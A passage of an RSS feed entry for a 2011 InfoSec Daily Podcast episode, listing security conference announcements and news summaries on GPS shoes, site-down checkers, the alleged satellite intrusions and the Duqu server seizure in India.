	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br />
	</span></a><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://news.discovery.com/tech/gps-shoes-track-kids-alzheimers-prostitutes-111028.html"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.discovery.com/tech/gps-shoes-track-kids-alzheimers-prostitutes-111028.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first batch of 3,000 shoes with integrated GPS devices &#8212; to help track down dementia-suffering seniors who wander off and get lost &#8212; just shipped from manufacturer </span><a href="http://www.gtxcorp.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">GTX Corp</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. to the </span><a href="http://www.foxnews.com/scitech/2011/10/27/gps-shoes-for-alzheimers-patients-safety/?cmpid=prn_discovery#"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">footwear</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> firm Aetrex, two years after plans were announced to develop the product.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company&#39;s first shoes &#8212; dreamed up back in 2002 following the Elizabeth Smart case &#8212; were intended to locate missing children. And safety is the driving force today behind the company&#39;s newest GPS-enabled shoe. </span><a href="http://news.yahoo.com/gps-shoes-alzheimers-patients-hit-us-105856809.html"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">According to AFP</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, The shoes will sell at around $300 a pair and buyers will be able to set up a monitoring service to locate &quot;wandering&quot; seniors suffering from Alzheimer&#39;s Disease.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The system is implanted in the heel of an otherwise normal shoe, and lets caregivers or family members monitor the wearer and even set up alerts if a person strays outside of a predefined area.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The shoes were certified by the Federal Communications Commission this year. GTX believes the market has great potential, given the soaring costs of Alzheimer&#39;s.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Our first shoe, a demo version of the Platform 001 sandal, was inspired by the prostitutes of ancient Greece and Rome, who enticed clients with their flutes and sandals that left &#39;follow me&#39; footprints in the earth,&quot; explains the website for </span><a href="http://www.sexygpsshoes.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Aphrodite Project</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Our contemporary sandals combine these poetic images from antiquity with promotional and safety features designed to meet the needs of today&rsquo;s sex workers.&quot;</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Aphrodite Project&#39;s sandals are designed to protect with a piercing siren to scare off threatening muggers or attackers and a GPS-powered system that can send warnings to police.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://smashinghub.com/10-excellent-website-to-check-a-site-down-or-blocked.htm"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://smashinghub.com/10-excellent-website-to-check-a-site-down-or-blocked.htm</span></a><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The list of 10 Best Websites That Let You Check If A Site Is Down Or Blocked:</span><br />
	<a href="http://just-ping.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Just Ping</span></a><img height="299px;" src="https://lh3.googleusercontent.com/BT3yrEwqRu_xN0CoeoEXGyo1IbIECS8Dtonqst0xOtA12QA8N9bISojys_OlH49Dq6OGQQ15DgaGX0eBd6x2Hfz5T2qeescWWBGmJWPAL__fpb6LHxE" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the name suggests, this website will ping the domain you entered from 50 locations from across the planet. Unless you see no &ldquo;Okey&rdquo; in the result, then that website is blocked in that location where the result comes out to be &ldquo;Packets lost (100%)&rdquo;.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But most of the times the results are different every time it is checked, so you should check more than one time.</span></p>
<p>	<a href="http://www.watchmouse.com/en/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Watch Mouse</span></a><img height="463px;" src="https://lh4.googleusercontent.com/aqDtakV4rSEd2Q6wYsztTK2ho_GQHeti30JHhuHr911HeRWt6Lze_Rj4FRFd6Niad0fUHZZtsaPNiR6KKZR39gVAEkhhDouJH0G4_1wNW4xPtVrTPd4" width="639px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This one is similar to the one mentioned above. It pings your website from 30 locations around the globe, and then lets you know if the website is down or blocked.</span></p>
<p>	<a href="http://www.downforeveryoneorjustme.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Down For Everyone Or Just Me</span></a><img height="143px;" src="https://lh3.googleusercontent.com/N5EICOssDotQeYSjWKZzDBNAB8CBMV_9TBgXoXW_532YBbRK84rRsfixL8eGCN79LzG3FGXDH5uAXSNcSIuQRNpTKlYqah6ZHK9VQA0332Rhka6_rQU" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The name says it all. It lets you check if the a specific site is down for everyone or just you. Simply enter any domain you want to check and get the result!</span></p>
<p>	<a href="http://www.isup.me/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">IsUp.Me</span></a><img height="104px;" src="https://lh3.googleusercontent.com/66M9EiP_AtglP6CVzOXbRBvg82vo8WVQgqXtLe7hLUaMkrTMvl8A9079o7nZ7NvbMptfSrJP5BijWxlGsJbiddLfwxjgI1O9mVeytzB3NtUz_Yfrbcs" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IsUp.Me is similar to the Down For Everyone Or Just Me. It works in exactly the same way.</span></p>
<p>
	<a href="http://www.downornot.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Down Or Not</span></a><img height="215px;" src="https://lh3.googleusercontent.com/N_XaXxwxKt7D98PtdSkKxzzTxackfxCcD8sXw0zIPAym0tcw8ovahM1ioHByDswrbBxDBbZh8EzOgQ7isr1sBv883yfSQ9S6OaH8NO5P0xs-C8sm_Dc" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Simply enter a website&rsquo;s domain, press the Return key, then this site will show you if the site is down or not. Simple. Picking up a site listed to check if it is down or blocked is also possible.</span></p>
<p>
	<a href="http://www.downforeveryoneorjustme.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Down Or Is It Just Me</span></a><img height="140px;" src="https://lh6.googleusercontent.com/DaoTgXjdka6NdhCAxQyECrm5JYvmw5BsEN4PXSobkhRYpCxOt1dnNY3ZllJifnd5OrHptZD56Q4H6k_1dcGhk62H_KsLWMSLqhTsyF6Gp1Va45Kya_Q" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is yet another website that lets you check if a site is really down or not simply by entering its domain.</span></p>
<p>	<a href="http://www.checksite.us/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Checksite.Us</span></a><img height="141px;" src="https://lh6.googleusercontent.com/0iTBwk1IYmBy6wib-SejMC5pM65zZwjdCzNiTNLH56x1qY6JWn7l5wYTu3VPRBMx0CpX8JFsjI71ejqQzaSFXQyRC-y0tpy25vtknHNJof3sukxe-pg" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just enter the domain of the site you wish to check, and then this website will show you if they can access that website.</span></p>
<p>	<a href="http://www.upordown.net/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Up Or Down</span></a><img height="321px;" src="https://lh5.googleusercontent.com/rZMAwzAkSNF4kIlGRi28s1dZWvneg8Bte3yNK9UaGPh0YArh-pj3HhkCOC9X3gOxwZxYE_IfOCAzYynH2a8ZF-7PAzXYu0sgGKZhAm3v-2J5o16g6zY" width="800px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This website lets you check if a site is up or down, simply by entering the domain.</span></p>
<p>	<a href="http://doj.me/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DOJ.me</span></a><img height="271px;" src="https://lh3.googleusercontent.com/1LBCuKzzcNbkqgNcSw5d_W4qVDZ2wGax1LY433uOiEtsYRgt4kmrqPP-3xhq5F3xoe596Ecd409P1yJHzvjujjkCuHejt4bGaJg_aIQ-k3CszbKRt6w" width="640px;" /></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DOJ.me is short for Down Or Just Me, so this site will show you if the specific website you checked is down or not.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span>&nbsp;<a href="http://www.dailymail.co.uk/news/article-2055311/Hackers-infiltrate-US-satellites-taken-complete-control-achieving-steps-required-command-satellite.html"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dailymail.co.uk/news/article-2055311/Hackers-infiltrate-US-satellites-taken-complete-control-achieving-steps-required-command-satellite.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chinese hackers are suspected of grabbing the reins of four US government satellites in 2008 potentially crashing them to Earth or stealing valuable information, more than once.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NASA admits one of the two satellites was temporarily accessed twice in the summer and fall that year, though would not comment on the other.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#39;While we cannot discuss additional details regarding the attempted interference, our satellite operations and associated systems and information are safe and secure&#39; NASA Public Affairs Officer Trent J. Perrotto said in a statement sent to Talking Points Memo. </span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NASA&#39;s admittance of the satellite breach comes one month before a report by the US-China Economic and Security Review Commission is released, detailing the attacks which are consistent with Chinese military writings.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the draft report, however, two satellites were infiltrated four times in 2007 and 2008 for 12 or more minutes.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Terra AM-a which NASA has acknowledged as attacked, studies earth climate change, in addition to weather and surface land use.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://9to5mac.com/2011/10/29/apple-acquired-mind-blowing-3d-mapping-company-c3-technologies-looking-to-take-ios-maps-to-the-next-level/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://9to5mac.com/2011/10/29/apple-acquired-mind-blowing-3d-mapping-company-c3-technologies-looking-to-take-ios-maps-to-the-next-level/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&rsquo;s Poly9 purchase obviously means Apple is at least interested in (or considering) the field of three-dimensional mapping solutions. We&rsquo;ve now confirmed that Apple has purchased a second 3D mapping company. In August of this year it was </span><a href="http://translate.google.com/translate?js=n&amp;prev=_t&amp;hl=sv&amp;ie=UTF-8&amp;layout=2&amp;eotf=1&amp;sl=auto&amp;tl=en&amp;u=http%3A%2F%2Fwww.nyteknik.se%2Fnyheter%2Farticle3219228.ece%23comments&amp;act=url"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">discovered</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that 3D mapping company C3 Technologies had been purchased and shut down by its buyer. While there was no true evidence for this, there was </span><a href="http://www.macrumors.com/2011/08/01/3d-mapping-company-c3-technologies-acquired-by-someone/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">speculation</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that Apple could be one of a handful of companies that could be the buyers of C3 Technologies.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sure enough, we have now learned Apple is now the owner of C3 Technologies. Sources say that C3 Technologies CEO Mattias Astrom, C3 Technologies CFO Kjell Cederstrand, and lead C3 Technologies Product Manager Ludvig Emgard are now working within Apple&rsquo;s iOS division. The leading trio, along with most of the former C3 Technologies team, is still working as a team in Sweden (interestingly, the division is now called &ldquo;Sputnik&rdquo;), where the C3 Technologies company was located prior to the Apple acquisition.</span><br />
	<img height="292px;" src="https://lh3.googleusercontent.com/GqqFkv7WTlwGvYMr-Y3Vnc1bYqVV6SF1NG58WWTrHfwhStISekod7dSEsX8WbaAI8QN-qN7vZ659Zqg5klLvFQ7cD8ccvvSrF1lKZDZL86PpgUaaz_U" width="537px;" /><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">C3 Technologies creates incredibly high-quality and detailed 3D maps with virtually no input from humans. The 3D mapping is camera based and the technology picks up buildings, homes, and even smaller objects like trees. C3&prime;s solution comes from declassified missile targeting methods. C3 Technologies&rsquo; official company description:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">C3 Technologies is the leading provider of 3D mapping solutions, offering photo-realistic models of the world for search, navigation and geographic information systems. Since 2007 when it was spun out of the aerospace and defense company Saab AB, venture-backed C3 has redefined mapping by applying previously classified image processing technology to the development of 3D maps as a platform for new social and commercial applications. The Sweden-based company&rsquo;s automated software and advanced algorithms enable C3 to rapidly assemble extremely precise 3D models, and seamlessly integrate them with traditional 2D maps, satellite images, street level photography and user generated images, that together are forever changing how people use maps and explore the world.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://threatpost.com/en_us/blogs/india-seizes-equipment-linked-duqu-attack-102911"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/india-seizes-equipment-linked-duqu-attack-102911</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials in India have seized components from a server as part of an investigation into the Duqu Trojan, according to a report.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Reuters, two workers at Web Werks, a web hosting company based in Mumbai, said the country&rsquo;s Department of Information Technology took the equipment after security vendor Symantec reported the server was communicating with computers infected with Duqu. First publicized earlier this month, Duqu gained widespread attention due to its similarities with the infamous Stuxnet worm.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In their analysis of the malware, researchers at Symantec have contended that Duqu may have been developed to gather information to lay the groundwork for a Stuxnet-style attack on critical infrastructure. While it doesn&rsquo;t contain code specifically targeting industrial control systems, Duqu does have elements in common with Stuxnet. For example, Dell SecureWorks&rsquo; Counter Threat Unit noted that the kernel drivers for Duqu and Stuxnet utilize many similar techniques in the name of stealth and encryption, such as a rootkit for concealing files. Those techniques however are not unique to either Stuxnet or Duqu, according to the Dell SecureWorks&#39; team.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thus far, security vendors have observed Duqu infections in a number of countries, including Iran and Sudan. The purpose of the malware however remains unclear.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Marty Edwards, director of the U.S. Department of Homeland Security&rsquo;s Industrial Control Systems Cyber Emergency Response Team, told Reuters his agency is working with its counterparts in other countries to uncover more information about the attack.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-508-tracking-ho%e2%80%99s-site-down-terraam-poly9-india-seizures/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3050/0/infosec-daily-podcast-episode-508.mp3" length="19783198" type="audio/mpeg" />
		<itunes:duration>0:41:10</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 508 for October 31, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think [...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 508 for October 31, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where:Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: &#160;http://news.discovery.com/tech/gps-shoes-track-kids-alzheimers-prostitutes-111028.html
	The first batch of 3,000 shoes with integrated GPS devices &#8212; to help track down dementia-suffering seniors who wander off and get lost &#8212; just shipped from manufacturer GTX Corp. to the footwear firm Aetrex, two years after plans were announced to develop the product.
	The company&#39;s first shoes &#8212; dreamed up back in 2002 following the Elizabeth Smart case &#8212; were intended to locate missing children. And safety is the driving force today behind the company&#39;s newest GPS-enabled shoe. According to AFP, The shoes will sell at around $300 a pair and buyers will be able to set up a monitoring service to locate &#34;wandering&#34; seniors suffering from Alzheimer&#39;s Disease.
	The system is implanted in the heel of an otherwise normal shoe, and lets caregivers or family members monitor the wearer and even set up alerts if a person strays outside of a predefined area.
	The shoes were certified by the Federal Communications Commission this year. GTX believes the market has great potential, given the soaring costs of Alzheimer&#39;s.
	&#8230;
	&#34;Our first shoe, a demo version of the Platform 001 sandal, was inspired by the prostitutes of ancient Greece and Rome, who enticed clients with their flutes and sandals that left &#39;follow me&#39; footprints in the earth,&#34; explains the website for The Aphrodite Project.
	&#34;Our contemporary sandals combine these poetic images from antiquity with promotional and safety features designed to meet the needs of today&#8217;s sex workers.&#34;
	The Aphrodite Project&#39;s sandals are designed to protect with a piercing siren to scare off threatening muggers or attackers and a GPS-powered system that can send warnings to police.
	Source: &#160;http://smashinghub.com/10-excellent-website-to-check-a-site-down-or-blocked.htm
	The list of 10 Best Websites That Let You Check If A Site Is Down Or Blocked:
	Just Ping
